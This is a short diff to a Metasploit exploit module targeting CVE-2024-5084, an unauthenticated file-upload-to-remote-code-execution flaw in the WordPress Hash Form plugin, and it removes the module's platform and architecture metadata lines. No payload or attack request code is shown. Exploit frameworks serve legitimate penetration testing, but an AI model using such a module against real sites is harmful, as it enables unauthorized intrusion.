@@ -34,8 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2024-5084'],
           ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution'],
         ],
-        'Platform' => ['php', 'unix', 'linux', 'win'],
-        'Arch' => [ARCH_PHP, ARCH_CMD],
         'Targets' => [
           [
             'PHP In-Memory', {
